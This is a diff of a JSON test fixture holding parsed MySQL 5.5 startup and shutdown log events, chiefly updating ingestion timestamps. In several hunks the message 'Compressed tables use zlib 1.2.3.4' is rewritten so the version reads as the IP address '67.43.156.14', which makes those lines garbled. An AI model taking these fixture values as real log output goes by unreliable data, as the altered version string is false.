 ],
@@ -955,7 +955,7 @@
 "@timestamp": "2016-12-09T14:18:56.000Z",
 "message": "InnoDB: The InnoDB memory heap is disabled",
 "event": {
- "ingested": "2021-06-21T12:35:18.730917921Z",
+ "ingested": "2021-12-09T13:41:34.472967900Z",
 "category": [
 "database"
 ],
@@ -970,7 +970,7 @@
 "@timestamp": "2016-12-09T14:18:56.000Z",
 "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
 "event": {
- "ingested": "2021-06-21T12:35:18.730919007Z",
+ "ingested": "2021-12-09T13:41:34.472973Z",
 "category": [
 "database"
 ],
@@ -983,9 +983,9 @@
 },
 {
 "@timestamp": "2016-12-09T14:18:56.000Z",
- "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+ "message": "InnoDB: Compressed tables use zlib 67.43.156.14",
 "event": {
- "ingested": "2021-06-21T12:35:18.730920349Z",
+ "ingested": "2021-12-09T13:41:34.472979800Z",
 "category": [
 "database"
 ],
@@ -1000,7 +1000,7 @@
 "@timestamp": "2016-12-09T14:18:56.000Z",
 "message": "InnoDB: Initializing buffer pool, size = 128.0M",
 "event": {
- "ingested": "2021-06-21T12:35:18.730921603Z",
+ "ingested": "2021-12-09T13:41:34.472986300Z",
 "category": [
 "database"
 ],
@@ -1015,7 +1015,7 @@
 "@timestamp": "2016-12-09T14:18:56.000Z",
 "message": "InnoDB: Completed initialization of buffer pool",
 "event": {
- "ingested": "2021-06-21T12:35:18.730922954Z",
+ "ingested": "2021-12-09T13:41:34.472992300Z",
 "category": [
 "database"
 ],
@@ -1030,7 +1030,7 @@
 "@timestamp": "2016-12-09T14:18:57.000Z",
 "message": "InnoDB: highest supported file format is Barracuda.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730924124Z",
+ "ingested": "2021-12-09T13:41:34.472998100Z",
 "category": [
 "database"
 ],
@@ -1045,7 +1045,7 @@
 "@timestamp": "2016-12-09T14:18:57.000Z",
 "message": "InnoDB: Waiting for the background threads to start",
 "event": {
- "ingested": "2021-06-21T12:35:18.730925418Z",
+ "ingested": "2021-12-09T13:41:34.473003200Z",
 "category": [
 "database"
 ],
@@ -1060,7 +1060,7 @@
 "@timestamp": "2016-12-09T14:18:58.000Z",
 "message": "InnoDB: 5.5.53 started; log sequence number 1595675",
 "event": {
- "ingested": "2021-06-21T12:35:18.730926530Z",
+ "ingested": "2021-12-09T13:41:34.473008800Z",
 "category": [
 "database"
 ],
@@ -1078,7 +1078,7 @@
 },
 "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306",
 "event": {
- "ingested": "2021-06-21T12:35:18.730927598Z",
+ "ingested": "2021-12-09T13:41:34.473015100Z",
 "category": [
 "database"
 ],
@@ -1096,7 +1096,7 @@
 },
 "message": "- '127.0.0.1' resolves to '127.0.0.1';",
 "event": {
- "ingested": "2021-06-21T12:35:18.730928933Z",
+ "ingested": "2021-12-09T13:41:34.473021500Z",
 "category": [
 "database"
 ],
@@ -1114,7 +1114,7 @@
 },
 "message": "Server socket created on IP: '127.0.0.1'.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730930023Z",
+ "ingested": "2021-12-09T13:41:34.473027700Z",
 "category": [
 "database"
 ],
@@ -1132,7 +1132,7 @@
 },
 "message": "Event Scheduler: Loaded 0 events",
 "event": {
- "ingested": "2021-06-21T12:35:18.730931458Z",
+ "ingested": "2021-12-09T13:41:34.473034100Z",
 "category": [
 "database"
 ],
@@ -1150,7 +1150,7 @@
 },
 "message": "/usr/sbin/mysqld: ready for connections.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730933142Z",
+ "ingested": "2021-12-09T13:41:34.473040800Z",
 "category": [
 "database"
 ],
@@ -1164,7 +1164,7 @@
 {
 "message": "Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)",
 "event": {
- "ingested": "2021-06-21T12:35:18.730934286Z",
+ "ingested": "2021-12-09T13:41:34.473047200Z",
 "category": [
 "database"
 ],
@@ -1182,7 +1182,7 @@
 },
 "message": "/usr/sbin/mysqld: Normal shutdown",
 "event": {
- "ingested": "2021-06-21T12:35:18.730935613Z",
+ "ingested": "2021-12-09T13:41:34.473053600Z",
 "category": [
 "database"
 ],
@@ -1196,7 +1196,7 @@
 {
 "message": "",
 "event": {
- "ingested": "2021-06-21T12:35:18.730936423Z",
+ "ingested": "2021-12-09T13:41:34.473060Z",
 "category": [
 "database"
 ],
@@ -1214,7 +1214,7 @@
 },
 "message": "Event Scheduler: Purging the queue. 0 events",
 "event": {
- "ingested": "2021-06-21T12:35:18.730937148Z",
+ "ingested": "2021-12-09T13:41:34.473066300Z",
 "category": [
 "database"
 ],
@@ -1229,7 +1229,7 @@
 "@timestamp": "2016-12-09T14:37:57.000Z",
 "message": "InnoDB: Starting shutdown...",
 "event": {
- "ingested": "2021-06-21T12:35:18.730937983Z",
+ "ingested": "2021-12-09T13:41:34.473072600Z",
 "category": [
 "database"
 ],
@@ -1244,7 +1244,7 @@
 "@timestamp": "2016-12-09T14:37:57.000Z",
 "message": "InnoDB: Shutdown completed; log sequence number 1595685",
 "event": {
- "ingested": "2021-06-21T12:35:18.730938868Z",
+ "ingested": "2021-12-09T13:41:34.473078900Z",
 "category": [
 "database"
 ],
@@ -1262,7 +1262,7 @@
 },
 "message": "/usr/sbin/mysqld: Shutdown complete",
 "event": {
- "ingested": "2021-06-21T12:35:18.730940028Z",
+ "ingested": "2021-12-09T13:41:34.473090500Z",
 "category": [
 "database"
 ],
@@ -1276,7 +1276,7 @@
 {
 "message": "",
 "event": {
- "ingested": "2021-06-21T12:35:18.730940873Z",
+ "ingested": "2021-12-09T13:41:34.473097200Z",
 "category": [
 "database"
 ],
@@ -1294,7 +1294,7 @@
 },
 "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730941538Z",
+ "ingested": "2021-12-09T13:41:34.473103500Z",
 "category": [
 "database"
 ],
@@ -1312,7 +1312,7 @@
 },
 "message": "Plugin 'FEDERATED' is disabled.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730942237Z",
+ "ingested": "2021-12-09T13:41:34.473109700Z",
 "category": [
 "database"
 ],
@@ -1327,7 +1327,7 @@
 "@timestamp": "2016-12-09T14:37:57.000Z",
 "message": "InnoDB: The InnoDB memory heap is disabled",
 "event": {
- "ingested": "2021-06-21T12:35:18.730943103Z",
+ "ingested": "2021-12-09T13:41:34.473115900Z",
 "category": [
 "database"
 ],
@@ -1342,7 +1342,7 @@
 "@timestamp": "2016-12-09T14:37:57.000Z",
 "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
 "event": {
- "ingested": "2021-06-21T12:35:18.730943758Z",
+ "ingested": "2021-12-09T13:41:34.473121400Z",
 "category": [
 "database"
 ],
@@ -1355,9 +1355,9 @@
 },
 {
 "@timestamp": "2016-12-09T14:37:57.000Z",
- "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+ "message": "InnoDB: Compressed tables use zlib 67.43.156.14",
 "event": {
- "ingested": "2021-06-21T12:35:18.730944420Z",
+ "ingested": "2021-12-09T13:41:34.473125400Z",
 "category": [
 "database"
 ],
@@ -1372,7 +1372,7 @@
 "@timestamp": "2016-12-09T14:37:57.000Z",
 "message": "InnoDB: Initializing buffer pool, size = 128.0M",
 "event": {
- "ingested": "2021-06-21T12:35:18.730945355Z",
+ "ingested": "2021-12-09T13:41:34.473130900Z",
 "category": [
 "database"
 ],
@@ -1387,7 +1387,7 @@
 "@timestamp": "2016-12-09T14:37:57.000Z",
 "message": "InnoDB: Completed initialization of buffer pool",
 "event": {
- "ingested": "2021-06-21T12:35:18.730946081Z",
+ "ingested": "2021-12-09T13:41:34.473137500Z",
 "category": [
 "database"
 ],
@@ -1402,7 +1402,7 @@
 "@timestamp": "2016-12-09T14:37:57.000Z",
 "message": "InnoDB: highest supported file format is Barracuda.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730946899Z",
+ "ingested": "2021-12-09T13:41:34.473142Z",
 "category": [
 "database"
 ],
@@ -1417,7 +1417,7 @@
 "@timestamp": "2016-12-09T14:37:57.000Z",
 "message": "InnoDB: Waiting for the background threads to start",
 "event": {
- "ingested": "2021-06-21T12:35:18.730947580Z",
+ "ingested": "2021-12-09T13:41:34.473147300Z",
 "category": [
 "database"
 ],
@@ -1432,7 +1432,7 @@
 "@timestamp": "2016-12-09T14:37:58.000Z",
 "message": "InnoDB: 5.5.53 started; log sequence number 1595685",
 "event": {
- "ingested": "2021-06-21T12:35:18.730948238Z",
+ "ingested": "2021-12-09T13:41:34.473154Z",
 "category": [
 "database"
 ],
@@ -1450,7 +1450,7 @@
 },
 "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306",
 "event": {
- "ingested": "2021-06-21T12:35:18.730949049Z",
+ "ingested": "2021-12-09T13:41:34.473160300Z",
 "category": [
 "database"
 ],
@@ -1468,7 +1468,7 @@
 },
 "message": "- '127.0.0.1' resolves to '127.0.0.1';",
 "event": {
- "ingested": "2021-06-21T12:35:18.730949705Z",
+ "ingested": "2021-12-09T13:41:34.473165700Z",
 "category": [
 "database"
 ],
@@ -1486,7 +1486,7 @@
 },
 "message": "Server socket created on IP: '127.0.0.1'.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730950624Z",
+ "ingested": "2021-12-09T13:41:34.473171Z",
 "category": [
 "database"
 ],
@@ -1504,7 +1504,7 @@
 },
 "message": "Event Scheduler: Loaded 0 events",
 "event": {
- "ingested": "2021-06-21T12:35:18.730951308Z",
+ "ingested": "2021-12-09T13:41:34.473175600Z",
 "category": [
 "database"
 ],
@@ -1522,7 +1522,7 @@
 },
 "message": "/usr/sbin/mysqld: ready for connections.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730951940Z",
+ "ingested": "2021-12-09T13:41:34.473181500Z",
 "category": [
 "database"
 ],
@@ -1536,7 +1536,7 @@
 {
 "message": "Version: '5.5.53-0ubuntu0.12.04.1-log' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)",
 "event": {
- "ingested": "2021-06-21T12:35:18.730952607Z",
+ "ingested": "2021-12-09T13:41:34.473187900Z",
 "category": [
 "database"
 ],
@@ -1554,7 +1554,7 @@
 },
 "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730953396Z",
+ "ingested": "2021-12-09T13:41:34.473194600Z",
 "category": [
 "database"
 ],
@@ -1572,7 +1572,7 @@
 },
 "message": "Plugin 'FEDERATED' is disabled.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730954097Z",
+ "ingested": "2021-12-09T13:41:34.473200900Z",
 "category": [
 "database"
 ],
@@ -1587,7 +1587,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730954840Z", + "ingested": "2021-12-09T13:41:34.473207300Z", "category": [ "database" ], @@ -1602,7 +1602,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730955702Z", + "ingested": "2021-12-09T13:41:34.473213600Z", "category": [ "database" ], @@ -1615,9 +1615,9 @@ }, { "@timestamp": "2016-12-09T14:18:50.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730956694Z", + "ingested": "2021-12-09T13:41:34.473219900Z", "category": [ "database" ], @@ -1632,7 +1632,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730957670Z", + "ingested": "2021-12-09T13:41:34.473226500Z", "category": [ "database" ], @@ -1647,7 +1647,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730958795Z", + "ingested": "2021-12-09T13:41:34.473235Z", "category": [ "database" ], @@ -1661,7 +1661,7 @@ { "message": "InnoDB: The first specified data file ./ibdata1 did not exist:", "event": { - "ingested": "2021-06-21T12:35:18.730959563Z", + "ingested": "2021-12-09T13:41:34.473244800Z", "category": [ "database" ], @@ -1675,7 +1675,7 @@ { "message": "InnoDB: a new database to be created!", "event": { - "ingested": "2021-06-21T12:35:18.730960368Z", + "ingested": "2021-12-09T13:41:34.473254100Z", "category": [ "database" ], 
@@ -1690,7 +1690,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Setting file ./ibdata1 size to 10 MB", "event": { - "ingested": "2021-06-21T12:35:18.730961131Z", + "ingested": "2021-12-09T13:41:34.473261200Z", "category": [ "database" ], @@ -1704,7 +1704,7 @@ { "message": "InnoDB: Database physically writes the file full: wait...", "event": { - "ingested": "2021-06-21T12:35:18.730961909Z", + "ingested": "2021-12-09T13:41:34.473268Z", "category": [ "database" ], @@ -1719,7 +1719,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Log file ./ib_logfile0 did not exist: new to be created", "event": { - "ingested": "2021-06-21T12:35:18.730962998Z", + "ingested": "2021-12-09T13:41:34.473274600Z", "category": [ "database" ], @@ -1733,7 +1733,7 @@ { "message": "InnoDB: Setting log file ./ib_logfile0 size to 5 MB", "event": { - "ingested": "2021-06-21T12:35:18.730963898Z", + "ingested": "2021-12-09T13:41:34.473280500Z", "category": [ "database" ], @@ -1747,7 +1747,7 @@ { "message": "InnoDB: Database physically writes the file full: wait...", "event": { - "ingested": "2021-06-21T12:35:18.730964819Z", + "ingested": "2021-12-09T13:41:34.473286Z", "category": [ "database" ], @@ -1762,7 +1762,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Log file ./ib_logfile1 did not exist: new to be created", "event": { - "ingested": "2021-06-21T12:35:18.730965716Z", + "ingested": "2021-12-09T13:41:34.473292300Z", "category": [ "database" ], @@ -1776,7 +1776,7 @@ { "message": "InnoDB: Setting log file ./ib_logfile1 size to 5 MB", "event": { - "ingested": "2021-06-21T12:35:18.730966811Z", + "ingested": "2021-12-09T13:41:34.473298600Z", "category": [ "database" ], @@ -1790,7 +1790,7 @@ { "message": "InnoDB: Database physically writes the file full: wait...", "event": { - "ingested": "2021-06-21T12:35:18.730967587Z", + "ingested": "2021-12-09T13:41:34.473302900Z", "category": [ "database" ], 
@@ -1804,7 +1804,7 @@ { "message": "InnoDB: Doublewrite buffer not found: creating new", "event": { - "ingested": "2021-06-21T12:35:18.730968243Z", + "ingested": "2021-12-09T13:41:34.473307400Z", "category": [ "database" ], @@ -1818,7 +1818,7 @@ { "message": "InnoDB: Doublewrite buffer created", "event": { - "ingested": "2021-06-21T12:35:18.730969019Z", + "ingested": "2021-12-09T13:41:34.473312500Z", "category": [ "database" ], @@ -1832,7 +1832,7 @@ { "message": "InnoDB: 127 rollback segment(s) active.", "event": { - "ingested": "2021-06-21T12:35:18.730969649Z", + "ingested": "2021-12-09T13:41:34.473318900Z", "category": [ "database" ], @@ -1846,7 +1846,7 @@ { "message": "InnoDB: Creating foreign key constraint system tables", "event": { - "ingested": "2021-06-21T12:35:18.730970341Z", + "ingested": "2021-12-09T13:41:34.473324300Z", "category": [ "database" ], @@ -1860,7 +1860,7 @@ { "message": "InnoDB: Foreign key constraint system tables created", "event": { - "ingested": "2021-06-21T12:35:18.730970972Z", + "ingested": "2021-12-09T13:41:34.473329200Z", "category": [ "database" ], @@ -1875,7 +1875,7 @@ "@timestamp": "2016-12-09T14:18:50.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730971627Z", + "ingested": "2021-12-09T13:41:34.473373Z", "category": [ "database" ], @@ -1890,7 +1890,7 @@ "@timestamp": "2016-12-09T14:18:51.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 0", "event": { - "ingested": "2021-06-21T12:35:18.730972319Z", + "ingested": "2021-12-09T13:41:34.473378800Z", "category": [ "database" ], @@ -1905,7 +1905,7 @@ "@timestamp": "2016-12-09T14:18:51.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730973043Z", + "ingested": "2021-12-09T13:41:34.473385100Z", "category": [ "database" ], 
@@ -1920,7 +1920,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730973793Z", + "ingested": "2021-12-09T13:41:34.473390700Z", "category": [ "database" ], @@ -1938,7 +1938,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730974700Z", + "ingested": "2021-12-09T13:41:34.473396Z", "category": [ "database" ], @@ -1956,7 +1956,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730975388Z", + "ingested": "2021-12-09T13:41:34.473401500Z", "category": [ "database" ], @@ -1971,7 +1971,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730976049Z", + "ingested": "2021-12-09T13:41:34.473407900Z", "category": [ "database" ], @@ -1986,7 +1986,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730976724Z", + "ingested": "2021-12-09T13:41:34.473414200Z", "category": [ "database" ], @@ -1999,9 +1999,9 @@ }, { "@timestamp": "2016-12-09T14:18:52.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730977396Z", + "ingested": "2021-12-09T13:41:34.473420400Z", "category": [ "database" ], @@ -2016,7 +2016,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730978163Z", + "ingested": "2021-12-09T13:41:34.473426700Z", "category": [ "database" ], 
@@ -2031,7 +2031,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730979189Z", + "ingested": "2021-12-09T13:41:34.473433100Z", "category": [ "database" ], @@ -2046,7 +2046,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.730980125Z", + "ingested": "2021-12-09T13:41:34.473439300Z", "category": [ "database" ], @@ -2061,7 +2061,7 @@ "@timestamp": "2016-12-09T14:18:52.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730980892Z", + "ingested": "2021-12-09T13:41:34.473445700Z", "category": [ "database" ], @@ -2076,7 +2076,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730981737Z", + "ingested": "2021-12-09T13:41:34.473451900Z", "category": [ "database" ], @@ -2090,7 +2090,7 @@ { "message": "ERROR: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ALTER TABLE user ADD column Show_view_priv enum('N','Y') CHARACTER SET utf8 NOT ' at line 1", "event": { - "ingested": "2021-06-21T12:35:18.730982429Z", + "ingested": "2021-12-09T13:41:34.473458200Z", "category": [ "database" ], @@ -2108,7 +2108,7 @@ }, "message": "Aborting", "event": { - "ingested": "2021-06-21T12:35:18.730983304Z", + "ingested": "2021-12-09T13:41:34.473464600Z", "category": [ "database" ], @@ -2123,7 +2123,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730984251Z", + "ingested": "2021-12-09T13:41:34.473470900Z", "category": [ "database" ], 
@@ -2138,7 +2138,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730985131Z", + "ingested": "2021-12-09T13:41:34.473477200Z", "category": [ "database" ], @@ -2153,7 +2153,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730986327Z", + "ingested": "2021-12-09T13:41:34.473483500Z", "category": [ "database" ], @@ -2171,7 +2171,7 @@ }, "message": "/usr/sbin/mysqld: Shutdown complete", "event": { - "ingested": "2021-06-21T12:35:18.730987264Z", + "ingested": "2021-12-09T13:41:34.473489900Z", "category": [ "database" ], @@ -2185,7 +2185,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.730987944Z", + "ingested": "2021-12-09T13:41:34.473496300Z", "category": [ "database" ], @@ -2203,7 +2203,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730988683Z", + "ingested": "2021-12-09T13:41:34.473502600Z", "category": [ "database" ], @@ -2221,7 +2221,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730989494Z", + "ingested": "2021-12-09T13:41:34.473508900Z", "category": [ "database" ], @@ -2236,7 +2236,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.730990289Z", + "ingested": "2021-12-09T13:41:34.473515300Z", "category": [ "database" ], @@ -2251,7 +2251,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.730991133Z", + "ingested": "2021-12-09T13:41:34.473521600Z", "category": [ "database" ], 
@@ -2264,9 +2264,9 @@ }, { "@timestamp": "2016-12-09T14:18:53.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.730992169Z", + "ingested": "2021-12-09T13:41:34.473526100Z", "category": [ "database" ], @@ -2281,7 +2281,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.730992823Z", + "ingested": "2021-12-09T13:41:34.473531300Z", "category": [ "database" ], @@ -2296,7 +2296,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.730993579Z", + "ingested": "2021-12-09T13:41:34.473537600Z", "category": [ "database" ], @@ -2311,7 +2311,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.730994303Z", + "ingested": "2021-12-09T13:41:34.473546600Z", "category": [ "database" ], @@ -2326,7 +2326,7 @@ "@timestamp": "2016-12-09T14:18:53.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.730995116Z", + "ingested": "2021-12-09T13:41:34.473551400Z", "category": [ "database" ], @@ -2341,7 +2341,7 @@ "@timestamp": "2016-12-09T14:18:54.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730996276Z", + "ingested": "2021-12-09T13:41:34.473556600Z", "category": [ "database" ], @@ -2356,7 +2356,7 @@ "@timestamp": "2016-12-09T14:18:54.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.730997004Z", + "ingested": "2021-12-09T13:41:34.473561100Z", "category": [ "database" ], 
@@ -2371,7 +2371,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.730997740Z", + "ingested": "2021-12-09T13:41:34.473566600Z", "category": [ "database" ], @@ -2389,7 +2389,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.730998460Z", + "ingested": "2021-12-09T13:41:34.473572900Z", "category": [ "database" ], @@ -2407,7 +2407,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.730999361Z", + "ingested": "2021-12-09T13:41:34.473579200Z", "category": [ "database" ], @@ -2422,7 +2422,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.731000094Z", + "ingested": "2021-12-09T13:41:34.473585400Z", "category": [ "database" ], @@ -2437,7 +2437,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.731000809Z", + "ingested": "2021-12-09T13:41:34.473591700Z", "category": [ "database" ], @@ -2450,9 +2450,9 @@ }, { "@timestamp": "2016-12-09T14:18:55.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.731001565Z", + "ingested": "2021-12-09T13:41:34.473597500Z", "category": [ "database" ], @@ -2467,7 +2467,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.731002236Z", + "ingested": "2021-12-09T13:41:34.473603800Z", "category": [ "database" ], 
@@ -2482,7 +2482,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.731002995Z", + "ingested": "2021-12-09T13:41:34.473610100Z", "category": [ "database" ], @@ -2497,7 +2497,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.731003840Z", + "ingested": "2021-12-09T13:41:34.473616400Z", "category": [ "database" ], @@ -2512,7 +2512,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.731004832Z", + "ingested": "2021-12-09T13:41:34.473622800Z", "category": [ "database" ], @@ -2527,7 +2527,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.731005932Z", + "ingested": "2021-12-09T13:41:34.473629100Z", "category": [ "database" ], @@ -2541,7 +2541,7 @@ { "message": "ERROR: 1050 Table 'plugin' already exists", "event": { - "ingested": "2021-06-21T12:35:18.731007260Z", + "ingested": "2021-12-09T13:41:34.473636Z", "category": [ "database" ], @@ -2559,7 +2559,7 @@ }, "message": "Aborting", "event": { - "ingested": "2021-06-21T12:35:18.731008258Z", + "ingested": "2021-12-09T13:41:34.473642400Z", "category": [ "database" ], @@ -2574,7 +2574,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.731009060Z", + "ingested": "2021-12-09T13:41:34.473648700Z", "category": [ "database" ], @@ -2589,7 +2589,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.731009937Z", + "ingested": "2021-12-09T13:41:34.473655Z", "category": [ "database" ], 
@@ -2604,7 +2604,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.731012706Z", + "ingested": "2021-12-09T13:41:34.473661300Z", "category": [ "database" ], @@ -2622,7 +2622,7 @@ }, "message": "/usr/sbin/mysqld: Shutdown complete", "event": { - "ingested": "2021-06-21T12:35:18.731013919Z", + "ingested": "2021-12-09T13:41:34.473667900Z", "category": [ "database" ], @@ -2636,7 +2636,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.731014699Z", + "ingested": "2021-12-09T13:41:34.473674300Z", "category": [ "database" ], @@ -2654,7 +2654,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.731015410Z", + "ingested": "2021-12-09T13:41:34.473680800Z", "category": [ "database" ], @@ -2672,7 +2672,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.731016111Z", + "ingested": "2021-12-09T13:41:34.473687100Z", "category": [ "database" ], @@ -2687,7 +2687,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.731016835Z", + "ingested": "2021-12-09T13:41:34.473694100Z", "category": [ "database" ], @@ -2702,7 +2702,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.731017611Z", + "ingested": "2021-12-09T13:41:34.473700Z", "category": [ "database" ], 
